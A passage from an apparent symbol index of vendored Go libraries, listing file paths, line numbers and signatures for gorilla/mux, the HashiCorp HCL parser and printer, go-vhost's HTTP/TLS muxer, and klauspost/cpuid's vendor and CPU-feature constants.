*RouteMatch) bool { type BuildVarsFunc (line 434) | type BuildVarsFunc FILE: vendor/github.com/gorilla/mux/test_helpers.go function SetURLVars (line 17) | func SetURLVars(r *http.Request, val map[string]string) *http.Request { FILE: vendor/github.com/hashicorp/hcl/decoder.go constant tagName (line 17) | tagName = "hcl" function Unmarshal (line 26) | func Unmarshal(bs []byte, v interface{}) error { function Decode (line 37) | func Decode(out interface{}, in string) error { function DecodeObject (line 48) | func DecodeObject(out interface{}, n ast.Node) error { type decoder (line 63) | type decoder struct method decode (line 67) | func (d *decoder) decode(name string, node ast.Node, result reflect.Va... method decodeBool (line 117) | func (d *decoder) decodeBool(name string, node ast.Node, result reflec... method decodeFloat (line 137) | func (d *decoder) decodeFloat(name string, node ast.Node, result refle... method decodeInt (line 157) | func (d *decoder) decodeInt(name string, node ast.Node, result reflect... method decodeInterface (line 194) | func (d *decoder) decodeInterface(name string, node ast.Node, result r... method decodeMap (line 300) | func (d *decoder) decodeMap(name string, node ast.Node, result reflect... method decodePtr (line 399) | func (d *decoder) decodePtr(name string, node ast.Node, result reflect... method decodeSlice (line 413) | func (d *decoder) decodeSlice(name string, node ast.Node, result refle... method decodeString (line 522) | func (d *decoder) decodeString(name string, node ast.Node, result refl... method decodeStruct (line 541) | func (d *decoder) decodeStruct(name string, node ast.Node, result refl... function expandObject (line 473) | func expandObject(node ast.Node, result reflect.Value) ast.Node { function findNodeType (line 723) | func findNodeType() reflect.Type { FILE: vendor/github.com/hashicorp/hcl/hcl/ast/ast.go type Node (line 13) | type Node interface type File (line 29) | type File struct method node (line 18) | func (File) node() {} method Pos (line 34) | func (f *File) Pos() token.Pos { type ObjectList (line 40) | type ObjectList struct method node (line 19) | func (ObjectList) node() {} method Add (line 44) | func (o *ObjectList) Add(item *ObjectItem) { method Filter (line 55) | func (o *ObjectList) Filter(keys ...string) *ObjectList { method Children (line 86) | func (o *ObjectList) Children() *ObjectList { method Elem (line 99) | func (o *ObjectList) Elem() *ObjectList { method Pos (line 110) | func (o *ObjectList) Pos() token.Pos { method GoString (line 219) | func (o *ObjectList) GoString() string { return fmt.Sprintf("*%#v", *o) } type ObjectItem (line 117) | type ObjectItem struct method node (line 21) | func (ObjectItem) node() {} method Pos (line 135) | func (o *ObjectItem) Pos() token.Pos { type ObjectKey (line 146) | type ObjectKey struct method node (line 20) | func (ObjectKey) node() {} method Pos (line 150) | func (o *ObjectKey) Pos() token.Pos { method GoString (line 218) | func (o *ObjectKey) GoString() string { return fmt.Sprintf("*%#v", *o) } type LiteralType (line 156) | type LiteralType struct method node (line 25) | func (LiteralType) node() {} method Pos (line 164) | func (l *LiteralType) Pos() token.Pos { type ListType (line 169) | type ListType struct method node (line 26) | func (ListType) node() {} method Pos (line 175) | func (l *ListType) Pos() token.Pos { method Add (line 179) | func (l *ListType) Add(node Node) { type ObjectType (line 184) | type ObjectType struct method node (line 24) | func (ObjectType) node() {} method Pos (line 190) | func (o *ObjectType) Pos() token.Pos { type Comment (line 195) | type Comment struct method node (line 22) | func (Comment) node() {} method Pos (line 200) | func (c *Comment) Pos() token.Pos { type CommentGroup (line 206) | type CommentGroup struct method node (line 23) | func (CommentGroup) node() {} method Pos (line 210) | func (c *CommentGroup) Pos() token.Pos { FILE: vendor/github.com/hashicorp/hcl/hcl/ast/walk.go type WalkFunc (line 8) | type WalkFunc function Walk (line 14) | func Walk(node Node, fn WalkFunc) Node { FILE: vendor/github.com/hashicorp/hcl/hcl/parser/error.go type PosError (line 10) | type PosError struct method Error (line 15) | func (e *PosError) Error() string { FILE: vendor/github.com/hashicorp/hcl/hcl/parser/parser.go type Parser (line 16) | type Parser struct method Parse (line 52) | func (p *Parser) Parse() (*ast.File, error) { method objectList (line 75) | func (p *Parser) objectList(obj bool) (*ast.ObjectList, error) { method consumeComment (line 111) | func (p *Parser) consumeComment() (comment *ast.Comment, endline int) { method consumeCommentGroup (line 129) | func (p *Parser) consumeCommentGroup(n int) (comments *ast.CommentGrou... method objectItem (line 147) | func (p *Parser) objectItem() (*ast.ObjectItem, error) { method objectKey (line 225) | func (p *Parser) objectKey() ([]*ast.ObjectKey, error) { method object (line 289) | func (p *Parser) object() (ast.Node, error) { method objectType (line 313) | func (p *Parser) objectType() (*ast.ObjectType, error) { method listType (line 343) | func (p *Parser) listType() (*ast.ListType, error) { method literalType (line 433) | func (p *Parser) literalType() (*ast.LiteralType, error) { method scan (line 444) | func (p *Parser) scan() token.Token { method unscan (line 496) | func (p *Parser) unscan() { method printTrace (line 503) | func (p *Parser) printTrace(a ...interface{}) { function newParser (line 32) | func newParser(src []byte) *Parser { function Parse (line 39) | func Parse(src []byte) (*ast.File, error) { function trace (line 522) | func trace(p *Parser, msg string) *Parser { function un (line 529) | func un(p *Parser) { FILE: vendor/github.com/hashicorp/hcl/hcl/printer/nodes.go constant blank (line 13) | blank = byte(' ') constant newline (line 14) | newline = byte('\n') constant tab (line 15) | tab = byte('\t') constant infinity (line 16) | infinity = 1 << 30 type printer (line 23) | type printer struct method collectComments (line 42) | func (p *printer) collectComments(node ast.Node) { method output (line 109) | func (p *printer) output(n interface{}) []byte { method literalType (line 219) | func (p *printer) literalType(lit *ast.LiteralType) []byte { method objectItem (line 244) | func (p *printer) objectItem(o *ast.ObjectItem) []byte { method objectType (line 288) | func (p *printer) objectType(o *ast.ObjectType) []byte { method alignedItems (line 454) | func (p *printer) alignedItems(items []*ast.ObjectItem) []byte { method list (line 519) | func (p *printer) list(l *ast.ListType) []byte { method isSingleLineList (line 604) | func (printer) isSingleLineList(l *ast.ListType) bool { method singleLineList (line 629) | func (p *printer) singleLineList(l *ast.ListType) []byte { method indent (line 652) | func (p *printer) indent(buf []byte) []byte { method unindent (line 676) | func (p *printer) unindent(buf []byte) []byte { method heredocIndent (line 706) | func (p *printer) heredocIndent(buf []byte) []byte { method isSingleLineObject (line 728) | func (p *printer) isSingleLineObject(val *ast.ObjectItem) bool { method printTrace (line 762) | func (p *printer) printTrace(a ...interface{}) { type ByPosition (line 34) | type ByPosition method Len (line 36) | func (b ByPosition) Len() int { return len(b) } method Swap (line 37) | func (b ByPosition) Swap(i, j int) { b[i], b[j] = b[j], b[i] } method Less (line 38) | func (b ByPosition) Less(i, j int) bool { return b[i].Pos().Before(b[j... function lines (line 749) | func lines(txt string) int { function trace (line 779) | func trace(p *printer, msg string) *printer { function un (line 786) | func un(p *printer) { FILE: vendor/github.com/hashicorp/hcl/hcl/printer/printer.go type Config (line 18) | type Config struct method Fprint (line 22) | func (c *Config) Fprint(output io.Writer, node ast.Node) error { function Fprint (line 47) | func Fprint(output io.Writer, node ast.Node) error { function Format (line 52) | func Format(src []byte) ([]byte, error) { FILE: vendor/github.com/hashicorp/hcl/hcl/scanner/scanner.go constant eof (line 17) | eof = rune(0) type Scanner (line 20) | type Scanner struct method next (line 67) | func (s *Scanner) next() rune { method unread (line 111) | func (s *Scanner) unread() { method peek (line 119) | func (s *Scanner) peek() rune { method Scan (line 130) | func (s *Scanner) Scan() token.Token { method scanComment (line 231) | func (s *Scanner) scanComment(ch rune) { method scanNumber (line 272) | func (s *Scanner) scanNumber(ch rune) token.Type { method scanMantissa (line 357) | func (s *Scanner) scanMantissa(ch rune) rune { method scanFraction (line 371) | func (s *Scanner) scanFraction(ch rune) rune { method scanExponent (line 381) | func (s *Scanner) scanExponent(ch rune) rune { method scanHeredoc (line 393) | func (s *Scanner) scanHeredoc() { method scanString (line 477) | func (s *Scanner) scanString() { method scanEscape (line 513) | func (s *Scanner) scanEscape() rune { method scanDigits (line 539) | func (s *Scanner) scanDigits(ch rune, base, n int) rune { method scanIdentifier (line 565) | func (s *Scanner) scanIdentifier() string { method recentPosition (line 581) | func (s *Scanner) recentPosition() (pos token.Pos) { method err (line 604) | func (s *Scanner) err(msg string) { function New (line 50) | func New(src []byte) *Scanner { function isLetter (line 617) | func isLetter(ch rune) bool { function isDigit (line 622) | func isDigit(ch rune) bool { function isDecimal (line 627) | func isDecimal(ch rune) bool { function isHexadecimal (line 632) | func isHexadecimal(ch rune) bool { function isWhitespace (line 637) | func isWhitespace(ch rune) bool { function digitVal (line 642) | func digitVal(ch rune) int { FILE: vendor/github.com/hashicorp/hcl/hcl/strconv/quote.go function Unquote (line 16) | func Unquote(s string) (t string, err error) { function contains (line 114) | func contains(s string, c byte) bool { function unhex (line 123) | func unhex(b byte) (v rune, ok bool) { function unquoteChar (line 136) | func unquoteChar(s string, quote byte) (value rune, multibyte bool, tail... FILE: vendor/github.com/hashicorp/hcl/hcl/token/position.go type Pos (line 8) | type Pos struct method IsValid (line 16) | func (p *Pos) IsValid() bool { return p.Line > 0 } method String (line 24) | func (p Pos) String() string { method Before (line 39) | func (p Pos) Before(u Pos) bool { method After (line 44) | func (p Pos) After(u Pos) bool { FILE: vendor/github.com/hashicorp/hcl/hcl/token/token.go type Token (line 14) | type Token struct method String (line 109) | func (t Token) String() string { method Value (line 118) | func (t Token) Value() interface{} { type Type (line 22) | type Type method String (line 83) | func (t Type) String() string { method IsIdentifier (line 96) | func (t Type) IsIdentifier() bool { return identifier_beg < t && t < i... method IsLiteral (line 100) | func (t Type) IsLiteral() bool { return literal_beg < t && t < literal... method IsOperator (line 104) | func (t Type) IsOperator() bool { return operator_beg < t && t < opera... constant ILLEGAL (line 26) | ILLEGAL Type = iota constant EOF (line 27) | EOF constant COMMENT (line 28) | COMMENT constant identifier_beg (line 30) | identifier_beg constant IDENT (line 31) | IDENT constant literal_beg (line 32) | literal_beg constant NUMBER (line 33) | NUMBER constant FLOAT (line 34) | FLOAT constant BOOL (line 35) | BOOL constant STRING (line 36) | STRING constant HEREDOC (line 37) | HEREDOC constant literal_end (line 38) | literal_end constant identifier_end (line 39) | identifier_end constant operator_beg (line 41) | operator_beg constant LBRACK (line 42) | LBRACK constant LBRACE (line 43) | LBRACE constant COMMA (line 44) | COMMA constant PERIOD (line 45) | PERIOD constant RBRACK (line 47) | RBRACK constant RBRACE (line 48) | RBRACE constant ASSIGN (line 50) | ASSIGN constant ADD (line 51) | ADD constant SUB (line 52) | SUB constant operator_end (line 53) | operator_end function unindentHeredoc (line 174) | func unindentHeredoc(heredoc string) string { FILE: vendor/github.com/hashicorp/hcl/json/parser/flatten.go function flattenObjects (line 6) | func flattenObjects(node ast.Node) { function flattenListType (line 46) | func flattenListType( function flattenObjectType (line 80) | func flattenObjectType( FILE: vendor/github.com/hashicorp/hcl/json/parser/parser.go type Parser (line 13) | type Parser struct method Parse (line 40) | func (p *Parser) Parse() (*ast.File, error) { method objectList (line 66) | func (p *Parser) objectList() (*ast.ObjectList, error) { method objectItem (line 94) | func (p *Parser) objectItem() (*ast.ObjectItem, error) { method objectKey (line 126) | func (p *Parser) objectKey() ([]*ast.ObjectKey, error) { method objectValue (line 159) | func (p *Parser) objectValue() (ast.Node, error) { method object (line 179) | func (p *Parser) object() (*ast.ObjectType, error) { method objectType (line 194) | func (p *Parser) objectType() (*ast.ObjectType, error) { method listType (line 213) | func (p *Parser) listType() (*ast.ListType, error) { method literalType (line 255) | func (p *Parser) literalType() (*ast.LiteralType, error) { method scan (line 265) | func (p *Parser) scan() token.Token { method unscan (line 277) | func (p *Parser) unscan() { method printTrace (line 284) | func (p *Parser) printTrace(a ...interface{}) { function newParser (line 25) | func newParser(src []byte) *Parser { function Parse (line 32) | func Parse(src []byte) (*ast.File, error) { function trace (line 303) | func trace(p *Parser, msg string) *Parser { function un (line 310) | func un(p *Parser) { FILE: vendor/github.com/hashicorp/hcl/json/scanner/scanner.go constant eof (line 14) | eof = rune(0) type Scanner (line 17) | type Scanner struct method next (line 64) | func (s *Scanner) next() rune { method unread (line 101) | func (s *Scanner) unread() { method peek (line 109) | func (s *Scanner) peek() rune { method Scan (line 120) | func (s *Scanner) Scan() token.Token { method scanNumber (line 217) | func (s *Scanner) scanNumber(ch rune) token.Type { method scanMantissa (line 251) | func (s *Scanner) scanMantissa(ch rune) rune { method scanFraction (line 265) | func (s *Scanner) scanFraction(ch rune) rune { method scanExponent (line 275) | func (s *Scanner) scanExponent(ch rune) rune { method scanString (line 287) | func (s *Scanner) scanString() { method scanEscape (line 323) | func (s *Scanner) scanEscape() rune { method scanDigits (line 349) | func (s *Scanner) scanDigits(ch rune, base, n int) rune { method scanIdentifier (line 364) | func (s *Scanner) scanIdentifier() string { method recentPosition (line 380) | func (s *Scanner) recentPosition() (pos token.Pos) { method err (line 403) | func (s *Scanner) err(msg string) { function New (line 47) | func New(src []byte) *Scanner { function isLetter (line 416) | func isLetter(ch rune) bool { function isDigit (line 421) | func isDigit(ch rune) bool { function isDecimal (line 426) | func isDecimal(ch rune) bool { function isHexadecimal (line 431) | func isHexadecimal(ch rune) bool { function isWhitespace (line 436) | func isWhitespace(ch rune) bool { function digitVal (line 441) | func digitVal(ch rune) int { FILE: vendor/github.com/hashicorp/hcl/json/token/position.go type Pos (line 8) | type Pos struct method IsValid (line 16) | func (p *Pos) IsValid() bool { return p.Line > 0 } method String (line 24) | func (p Pos) String() string { method Before (line 39) | func (p Pos) Before(u Pos) bool { method After (line 44) | func (p Pos) After(u Pos) bool { FILE: vendor/github.com/hashicorp/hcl/json/token/token.go type Token (line 11) | type Token struct method String (line 96) | func (t Token) String() string { method HCLToken (line 103) | func (t Token) HCLToken() hcltoken.Token { type Type (line 18) | type Type method String (line 70) | func (t Type) String() string { method IsIdentifier (line 83) | func (t Type) IsIdentifier() bool { return identifier_beg < t && t < i... method IsLiteral (line 87) | func (t Type) IsLiteral() bool { return literal_beg < t && t < literal... method IsOperator (line 91) | func (t Type) IsOperator() bool { return operator_beg < t && t < opera... constant ILLEGAL (line 22) | ILLEGAL Type = iota constant EOF (line 23) | EOF constant identifier_beg (line 25) | identifier_beg constant literal_beg (line 26) | literal_beg constant NUMBER (line 27) | NUMBER constant FLOAT (line 28) | FLOAT constant BOOL (line 29) | BOOL constant STRING (line 30) | STRING constant NULL (line 31) | NULL constant literal_end (line 32) | literal_end constant identifier_end (line 33) | identifier_end constant operator_beg (line 35) | operator_beg constant LBRACK (line 36) | LBRACK constant LBRACE (line 37) | LBRACE constant COMMA (line 38) | COMMA constant PERIOD (line 39) | PERIOD constant COLON (line 40) | COLON constant RBRACK (line 42) | RBRACK constant RBRACE (line 43) | RBRACE constant operator_end (line 45) | operator_end FILE: vendor/github.com/hashicorp/hcl/lex.go type lexModeValue (line 8) | type lexModeValue constant lexModeUnknown (line 11) | lexModeUnknown lexModeValue = iota constant lexModeHcl (line 12) | lexModeHcl constant lexModeJson (line 13) | lexModeJson function lexMode (line 18) | func lexMode(v []byte) lexModeValue { FILE: vendor/github.com/hashicorp/hcl/parse.go function ParseBytes (line 14) | func ParseBytes(in []byte) (*ast.File, error) { function ParseString (line 19) | func ParseString(input string) (*ast.File, error) { function parse (line 23) | func parse(in []byte) (*ast.File, error) { function Parse (line 37) | func Parse(input string) (*ast.File, error) { FILE: vendor/github.com/inconshreveable/go-vhost/http.go type HTTPConn (line 9) | type HTTPConn struct method Free (line 32) | func (c *HTTPConn) Free() { method Host (line 36) | func (c *HTTPConn) Host() string { function HTTP (line 16) | func HTTP(conn net.Conn) (httpConn *HTTPConn, err error) { FILE: vendor/github.com/inconshreveable/go-vhost/interface.go type Conn (line 7) | type Conn interface FILE: vendor/github.com/inconshreveable/go-vhost/mux.go type NotFound (line 23) | type NotFound struct type BadRequest (line 28) | type BadRequest struct type Closed (line 33) | type Closed struct type muxFn (line 40) | type muxFn type muxErr (line 43) | type muxErr struct type VhostMuxer (line 49) | type VhostMuxer struct method Listen (line 73) | func (m *VhostMuxer) Listen(name string) (net.Listener, error) { method NextError (line 91) | func (m *VhostMuxer) NextError() (net.Conn, error) { method Close (line 97) | func (m *VhostMuxer) Close() { method run (line 102) | func (m *VhostMuxer) run() { method handle (line 119) | func (m *VhostMuxer) handle(conn net.Conn) { method sendError (line 158) | func (m *VhostMuxer) sendError(conn net.Conn, err error) { method get (line 162) | func (m *VhostMuxer) get(name string) (l *Listener, ok bool) { method set (line 181) | func (m *VhostMuxer) set(name string, l *Listener) error { method del (line 191) | func (m *VhostMuxer) del(name string) { function NewVhostMuxer (line 58) | func NewVhostMuxer(listener net.Listener, vhostFn muxFn, muxTimeout time... constant serverError (line 198) | serverError = `HTTP/1.0 500 Internal Server Error constant notFound (line 204) | notFound = `HTTP/1.0 404 Not Found constant badRequest (line 210) | badRequest = `HTTP/1.0 400 Bad Request type HTTPMuxer (line 217) | type HTTPMuxer struct method HandleErrors (line 223) | func (m *HTTPMuxer) HandleErrors() { method HandleError (line 229) | func (m *HTTPMuxer) HandleError(conn net.Conn, err error) { function NewHTTPMuxer (line 250) | func NewHTTPMuxer(listener net.Listener, muxTimeout time.Duration) (*HTT... type TLSMuxer (line 256) | type TLSMuxer struct method HandleErrors (line 264) | func (m *TLSMuxer) HandleErrors() { method Listen (line 281) | func (m *TLSMuxer) Listen(name string) (net.Listener, error) { function NewTLSMuxer (line 291) | func NewTLSMuxer(listener net.Listener, muxTimeout time.Duration) (*TLSM... type Listener (line 304) | type Listener struct method Accept (line 312) | func (l *Listener) Accept() (net.Conn, error) { method Close (line 322) | func (l *Listener) Close() error { method Addr (line 329) | func (l *Listener) Addr() net.Addr { method Name (line 335) | func (l *Listener) Name() string { FILE: vendor/github.com/inconshreveable/go-vhost/shared.go constant initVhostBufSize (line 11) | initVhostBufSize = 1024 type sharedConn (line 14) | type sharedConn struct method Read (line 29) | func (c *sharedConn) Read(p []byte) (n int, err error) { function newShared (line 20) | func newShared(conn net.Conn) (*sharedConn, io.Reader) { FILE: vendor/github.com/inconshreveable/go-vhost/tls.go constant maxPlaintext (line 19) | maxPlaintext = 16384 constant maxCiphertext (line 20) | maxCiphertext = 16384 + 2048 constant recordHeaderLen (line 21) | recordHeaderLen = 5 constant maxHandshake (line 22) | maxHandshake = 65536 type alert (line 25) | type alert method String (line 39) | func (e alert) String() string { method Error (line 47) | func (e alert) Error() string { constant alertUnexpectedMessage (line 28) | alertUnexpectedMessage alert = 10 constant alertRecordOverflow (line 29) | alertRecordOverflow alert = 22 constant alertInternalError (line 30) | alertInternalError alert = 80 type recordType (line 52) | type recordType constant recordTypeHandshake (line 55) | recordTypeHandshake recordType = 22 constant typeClientHello (line 60) | typeClientHello uint8 = 1 constant statusTypeOCSP (line 75) | statusTypeOCSP uint8 = 1 type TLSConn (line 80) | type TLSConn struct method Host (line 98) | func (c *TLSConn) Host() string { method Free (line 105) | func (c *TLSConn) Free() { function TLS (line 87) | func TLS(conn net.Conn) (tlsConn *TLSConn, err error) { type block (line 110) | type block struct method resize (line 116) | func (b *block) resize(n int) { method reserve (line 124) | func (b *block) reserve(n int) { method readFromUntil (line 142) | func (b *block) readFromUntil(r io.Reader, n int) error { method Read (line 163) | func (b *block) Read(p []byte) (n int, err error) { function newBlock (line 170) | func newBlock() *block { function splitBlock (line 177) | func splitBlock(b *block, n int) (*block, *block) { function readClientHello (line 190) | func readClientHello(rd io.Reader) (*ClientHelloMsg, error) { type ClientHelloMsg (line 282) | type ClientHelloMsg struct method unmarshal (line 298) | func (m *ClientHelloMsg) unmarshal(data []byte) bool { FILE: vendor/github.com/klauspost/cpuid/v2/cpuid.go type Vendor (line 27) | type Vendor constant VendorUnknown (line 30) | VendorUnknown Vendor = iota constant Intel (line 31) | Intel constant AMD (line 32) | AMD constant VIA (line 33) | VIA constant Transmeta (line 34) | Transmeta constant NSC (line 35) | NSC constant KVM (line 36) | KVM constant MSVM (line 37) | MSVM constant VMware (line 38) | VMware constant XenHVM (line 39) | XenHVM constant Bhyve (line 40) | Bhyve constant Hygon (line 41) | Hygon constant SiS (line 42) | SiS constant RDC (line 43) | RDC constant Ampere (line 45) | Ampere constant ARM (line 46) | ARM constant Broadcom (line 47) | Broadcom constant Cavium (line 48) | Cavium constant DEC (line 49) | DEC constant Fujitsu (line 50) | Fujitsu constant Infineon (line 51) | Infineon constant Motorola (line 52) | Motorola constant NVIDIA (line 53) | NVIDIA constant AMCC (line 54) | AMCC constant Qualcomm (line 55) | Qualcomm constant Marvell (line 56) | Marvell constant lastVendor (line 58) | lastVendor type FeatureID (line 64) | type FeatureID constant UNKNOWN (line 68) | UNKNOWN = -1 constant ADX (line 71) | ADX FeatureID = iota constant AESNI (line 72) | AESNI constant AMD3DNOW (line 73) | AMD3DNOW constant AMD3DNOWEXT (line 74) | AMD3DNOWEXT constant AMXBF16 (line 75) | AMXBF16 constant AMXFP16 (line 76) | AMXFP16 constant AMXINT8 (line 77) | AMXINT8 constant AMXTILE (line 78) | AMXTILE constant APX_F (line 79) | APX_F constant AVX (line 80) | AVX constant AVX10 (line 81) | AVX10 constant AVX10_128 (line 82) | AVX10_128 constant AVX10_256 (line 83) | AVX10_256 constant AVX10_512 (line 84) | AVX10_512 constant AVX2 (line 85) | AVX2 constant AVX512BF16 (line 86) | AVX512BF16 constant AVX512BITALG (line 87) | AVX512BITALG constant AVX512BW (line 88) | AVX512BW constant AVX512CD (line 89) | AVX512CD constant AVX512DQ (line 90) | AVX512DQ constant AVX512ER (line 91) | AVX512ER constant AVX512F (line 92) | AVX512F constant AVX512FP16 (line 93) | AVX512FP16 constant AVX512IFMA (line 94) | AVX512IFMA constant AVX512PF (line 95) | AVX512PF constant AVX512VBMI (line 96) | AVX512VBMI constant AVX512VBMI2 (line 97) | AVX512VBMI2 constant AVX512VL (line 98) | AVX512VL constant AVX512VNNI (line 99) | AVX512VNNI constant AVX512VP2INTERSECT (line 100) | AVX512VP2INTERSECT constant AVX512VPOPCNTDQ (line 101) | AVX512VPOPCNTDQ constant AVXIFMA (line 102) | AVXIFMA constant AVXNECONVERT (line 103) | AVXNECONVERT constant AVXSLOW (line 104) | AVXSLOW constant AVXVNNI (line 105) | AVXVNNI constant AVXVNNIINT8 (line 106) | AVXVNNIINT8 constant BHI_CTRL (line 107) | BHI_CTRL constant BMI1 (line 108) | BMI1 constant BMI2 (line 109) | BMI2 constant CETIBT (line 110) | CETIBT constant CETSS (line 111) | CETSS constant CLDEMOTE (line 112) | CLDEMOTE constant CLMUL (line 113) | CLMUL constant CLZERO (line 114) | CLZERO constant CMOV (line 115) | CMOV constant CMPCCXADD (line 116) | CMPCCXADD constant CMPSB_SCADBS_SHORT (line 117) | CMPSB_SCADBS_SHORT constant CMPXCHG8 (line 118) | CMPXCHG8 constant CPBOOST (line 119) | CPBOOST constant CPPC (line 120) | CPPC constant CX16 (line 121) | CX16 constant EFER_LMSLE_UNS (line 122) | EFER_LMSLE_UNS constant ENQCMD (line 123) | ENQCMD constant ERMS (line 124) | ERMS constant F16C (line 125) | F16C constant FLUSH_L1D (line 126) | FLUSH_L1D constant FMA3 (line 127) | FMA3 constant FMA4 (line 128) | FMA4 constant FP128 (line 129) | FP128 constant FP256 (line 130) | FP256 constant FSRM (line 131) | FSRM constant FXSR (line 132) | FXSR constant FXSROPT (line 133) | FXSROPT constant GFNI (line 134) | GFNI constant HLE (line 135) | HLE constant HRESET (line 136) | HRESET constant HTT (line 137) | HTT constant HWA (line 138) | HWA constant HYBRID_CPU (line 139) | HYBRID_CPU constant HYPERVISOR (line 140) | HYPERVISOR constant IA32_ARCH_CAP (line 141) | IA32_ARCH_CAP constant IA32_CORE_CAP (line 142) | IA32_CORE_CAP constant IBPB (line 143) | IBPB constant IBPB_BRTYPE (line 144) | IBPB_BRTYPE constant IBRS (line 145) | IBRS constant IBRS_PREFERRED (line 146) | IBRS_PREFERRED constant IBRS_PROVIDES_SMP (line 147) | IBRS_PROVIDES_SMP constant IBS (line 148) | IBS constant IBSBRNTRGT (line 149) | IBSBRNTRGT constant IBSFETCHSAM (line 150) | IBSFETCHSAM constant IBSFFV (line 151) | IBSFFV constant IBSOPCNT (line 152) | IBSOPCNT constant IBSOPCNTEXT (line 153) | IBSOPCNTEXT constant IBSOPSAM (line 154) | IBSOPSAM constant IBSRDWROPCNT (line 155) | IBSRDWROPCNT constant IBSRIPINVALIDCHK (line 156) | IBSRIPINVALIDCHK constant IBS_FETCH_CTLX (line 157) | IBS_FETCH_CTLX constant IBS_OPDATA4 (line 158) | IBS_OPDATA4 constant IBS_OPFUSE (line 159) | IBS_OPFUSE constant IBS_PREVENTHOST (line 160) | IBS_PREVENTHOST constant IBS_ZEN4 (line 161) | IBS_ZEN4 constant IDPRED_CTRL (line 162) | IDPRED_CTRL constant INT_WBINVD (line 163) | INT_WBINVD constant INVLPGB (line 164) | INVLPGB constant KEYLOCKER (line 165) | KEYLOCKER constant KEYLOCKERW (line 166) | KEYLOCKERW constant LAHF (line 167) | LAHF constant LAM (line 168) | LAM constant LBRVIRT (line 169) | LBRVIRT constant LZCNT (line 170) | LZCNT constant MCAOVERFLOW (line 171) | MCAOVERFLOW constant MCDT_NO (line 172) | MCDT_NO constant MCOMMIT (line 173) | MCOMMIT constant MD_CLEAR (line 174) | MD_CLEAR constant MMX (line 175) | MMX constant MMXEXT (line 176) | MMXEXT constant MOVBE (line 177) | MOVBE constant MOVDIR64B (line 178) | MOVDIR64B constant MOVDIRI (line 179) | MOVDIRI constant MOVSB_ZL (line 180) | MOVSB_ZL constant MOVU (line 181) | MOVU constant MPX (line 182) | MPX constant MSRIRC (line 183) | MSRIRC constant MSRLIST (line 184) | MSRLIST constant MSR_PAGEFLUSH (line 185) | MSR_PAGEFLUSH constant NRIPS (line 186) | NRIPS constant NX (line 187) | NX constant OSXSAVE (line 188) | OSXSAVE constant PCONFIG (line 189) | PCONFIG constant POPCNT (line 190) | POPCNT constant PPIN (line 191) | PPIN constant PREFETCHI (line 192) | PREFETCHI constant PSFD (line 193) | PSFD constant RDPRU (line 194) | RDPRU constant RDRAND (line 195) | RDRAND constant RDSEED (line 196) | RDSEED constant RDTSCP (line 197) | RDTSCP constant RRSBA_CTRL (line 198) | RRSBA_CTRL constant RTM (line 199) | RTM constant RTM_ALWAYS_ABORT (line 200) | RTM_ALWAYS_ABORT constant SBPB (line 201) | SBPB constant SERIALIZE (line 202) | SERIALIZE constant SEV (line 203) | SEV constant SEV_64BIT (line 204) | SEV_64BIT constant SEV_ALTERNATIVE (line 205) | SEV_ALTERNATIVE constant SEV_DEBUGSWAP (line 206) | SEV_DEBUGSWAP constant SEV_ES (line 207) | SEV_ES constant SEV_RESTRICTED (line 208) | SEV_RESTRICTED constant SEV_SNP (line 209) | SEV_SNP constant SGX (line 210) | SGX constant SGXLC (line 211) | SGXLC constant SHA (line 212) | SHA constant SME (line 213) | SME constant SME_COHERENT (line 214) | SME_COHERENT constant SPEC_CTRL_SSBD (line 215) | SPEC_CTRL_SSBD constant SRBDS_CTRL (line 216) | SRBDS_CTRL constant SRSO_MSR_FIX (line 217) | SRSO_MSR_FIX constant SRSO_NO (line 218) | SRSO_NO constant SRSO_USER_KERNEL_NO (line 219) | SRSO_USER_KERNEL_NO constant SSE (line 220) | SSE constant SSE2 (line 221) | SSE2 constant SSE3 (line 222) | SSE3 constant SSE4 (line 223) | SSE4 constant SSE42 (line 224) | SSE42 constant SSE4A (line 225) | SSE4A constant SSSE3 (line 226) | SSSE3 constant STIBP (line 227) | STIBP constant STIBP_ALWAYSON (line 228) | STIBP_ALWAYSON constant STOSB_SHORT (line 229) | STOSB_SHORT constant SUCCOR (line 230) | SUCCOR constant SVM (line 231) | SVM constant SVMDA (line 232) | SVMDA constant SVMFBASID (line 233) | SVMFBASID constant SVML (line 234) | SVML constant SVMNP (line 235) | SVMNP constant SVMPF (line 236) | SVMPF constant SVMPFT (line 237) | SVMPFT constant SYSCALL (line 238) | SYSCALL constant SYSEE (line 239) | SYSEE constant TBM (line 240) | TBM constant TDX_GUEST (line 241) | TDX_GUEST constant TLB_FLUSH_NESTED (line 242) | TLB_FLUSH_NESTED constant TME (line 243) | TME constant TOPEXT (line 244) | TOPEXT constant TSCRATEMSR (line 245) | TSCRATEMSR constant TSXLDTRK (line 246) | TSXLDTRK constant VAES (line 247) | VAES constant VMCBCLEAN (line 248) | VMCBCLEAN constant VMPL (line 249) | VMPL constant VMSA_REGPROT (line 250) | VMSA_REGPROT constant VMX (line 251) | VMX constant VPCLMULQDQ (line 252) | VPCLMULQDQ constant VTE (line 253) | VTE constant WAITPKG (line 254) | WAITPKG constant WBNOINVD (line 255) | WBNOINVD constant WRMSRNS (line 256) | WRMSRNS constant X87 (line 257) | X87 constant XGETBV1 (line 258) | XGETBV1 constant XOP (line 259) | XOP constant XSAVE (line 260) | XSAVE constant XSAVEC (line 261) | XSAVEC constant XSAVEOPT (line 262) | XSAVEOPT constant XSAVES (line 263) | XSAVES constant AESARM (line 266) | AESARM constant ARMCPUID (line 267) | ARMCPUID constant ASIMD (line 268) | ASIMD constant ASIMDDP (line 269) | ASIMDDP constant ASIMDHP (line 270) | ASIMDHP constant ASIMDRDM (line 271) | ASIMDRDM constant ATOMICS (line 272) | ATOMICS constant CRC32 (line 273) | CRC32 constant DCPOP (line 274) | DCPOP constant EVTSTRM (line 275) | EVTSTRM constant FCMA (line 276) | FCMA constant FP (line 277) | FP constant FPHP (line 278) | FPHP constant GPA (line 279) | GPA constant JSCVT (line 280) | JSCVT constant LRCPC (line 281) | LRCPC constant PMULL (line 282) | PMULL constant SHA1 (line 283) | SHA1 constant SHA2 (line 284) | SHA2 constant SHA3 (line 285) | SHA3 constant SHA512 (line 286) | SHA512 constant SM3 (line 287) | SM3 constant SM4 (line 288) | SM4 constant SVE (line 289) | SVE constant lastID (line 291) | lastID constant firstID (line 293) | firstID FeatureID = UNKNOWN + 1 type CPUInfo (line 297) | type CPUInfo struct method Supports (line 401) | func (c CPUInfo) Supports(ids ...FeatureID) bool { method Has (line 412) | func (c *CPUInfo) Has(id FeatureID) bool { method AnyOf (line 417) | func (c CPUInfo) AnyOf(ids ...FeatureID) bool { method HasAll 